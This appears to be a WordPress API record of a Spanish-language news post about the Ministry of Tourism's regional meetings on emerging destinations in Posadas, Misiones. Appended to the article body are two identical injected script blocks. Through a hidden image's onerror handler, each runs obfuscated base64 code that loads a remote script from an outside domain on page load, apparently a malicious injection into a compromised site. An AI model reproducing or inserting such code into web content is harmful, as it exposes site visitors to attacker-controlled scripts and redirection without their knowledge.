{"id":2640,"date":"2023-05-17T10:15:50","date_gmt":"2023-05-17T13:15:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2640"},"modified":"2025-08-14T00:16:46","modified_gmt":"2025-08-14T03:16:46","slug":"continuaron-en-el-litoral-los-encuentros-regionales-de-destinos-emergentes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2640","title":{"rendered":"Continuaron en el Litoral los Encuentros Regionales de Destinos Emergentes"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-color\" style=\"color:#093f5d\"><em>Organizados por el Ministerio de Turismo y Deportes de la Naci\u00f3n<\/em><\/h3>\n\n\n\n<p>Con la participaci\u00f3n de m\u00e1s de 50 representantes de municipios del&nbsp;<strong>Litoral<\/strong>, se llev\u00f3 adelante un nuevo ciclo de los&nbsp;<strong>Encuentros Regionales de Destinos Emergentes en la ciudad de Posadas<\/strong>, provincia de Misiones, con dos jornadas de exposiciones, debates y talleres sobre el futuro del turismo.<\/p>\n\n\n\n<p>\u201c<em>Los destinos emergentes son los activos latentes que tiene nuestro territorio<\/em>\u201d, asegur\u00f3 el director nacional de Planificaci\u00f3n y Desarrollo del ministerio nacional,&nbsp;<strong>Sergio Castro<\/strong>, durante la apertura del evento, en el Centro de Convenciones de Posadas. El vicegobernador de la provincia de Misiones,&nbsp;<strong>Carlo Arce<\/strong>; el ministro de Turismo provincial,&nbsp;<strong>Jos\u00e9 Mar\u00eda Arr\u00faa<\/strong>; la directora nacional de Fiestas Nacionales y Eventos,&nbsp;<strong>Fernanda Rodr\u00edguez<\/strong>; y el titular de la Unidad Ejecutora Promover Turismo Federal y Sostenible,&nbsp;<strong>Esteban Bruno<\/strong>, tambi\u00e9n estuvieron presentes en el acto.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"307\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-1024x307.jpeg\" alt=\"\" class=\"wp-image-2641\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-1024x307.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-300x90.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-768x231.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-1536x461.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-696x209.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-1068x321.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_-1399x420.jpeg 1399w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_101353_www.argentina.gob_.ar_.jpeg 1722w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u201cLos \u00e9xitos agotados del turismo\u201d, \u201cpreguntas y par\u00e1metros para garantizar el aporte del turismo al desarrollo local con equidad e inclusi\u00f3n\u201d, \u201cdestinos emergentes como emblemas de un turismo responsable\u201d, \u201cactores del desarrollo o espectadores del crecimiento\u201d, \u201ccrear y entregar valor local\u201d, \u201cmarcos normativos y fiscales con sentido\u201d, \u201cturismo en redes, ideas en acci\u00f3n\u201d, \u201cg\u00e9nero y empleo: el turismo como derecho\u201d, \u201cgeneraci\u00f3n sostenible, consumo responsable\u201d, \u201cel turismo como factor de arraigo\u201d, fueron algunos de los encuadres del encuentro, donde tambi\u00e9n se realizaron intercambios sobre programas del ministerio nacional, como La Ruta Natural; Promover Turismo Federal y Sostenible; Marca Pa\u00eds; Fiestas Argentinas; Gustar y N\u00f3mades Digitales, entre otros.<\/p>\n\n\n\n<p>De las jornadas, participaron&nbsp;<strong>120 representantes del sector p\u00fablico, privado e instituciones<\/strong>&nbsp;de las provincias de Chaco, Formosa, Misiones, Corrientes, Entre R\u00edos y Santa Fe. Con el objetivo de posicionar al turismo como hecho social transformador, los Encuentros Regionales de Destinos Emergentes se iniciaron en abril en la regi\u00f3n de Cuyo en San Juan.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Organizados por el Ministerio de Turismo y Deportes de la Naci\u00f3n Con la participaci\u00f3n de m\u00e1s de 50 representantes de municipios del&nbsp;Litoral, se llev\u00f3 adelante un nuevo ciclo de los&nbsp;Encuentros Regionales de Destinos Emergentes en la ciudad de Posadas, provincia de Misiones, con dos jornadas de exposiciones, debates y talleres sobre el futuro del turismo. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2642,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-2640","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2640"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2640"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2640\/revisions"}],"predecessor-version":[{"id":7082,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2640\/revisions\/7082"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2642"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2640"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2640"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2640"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}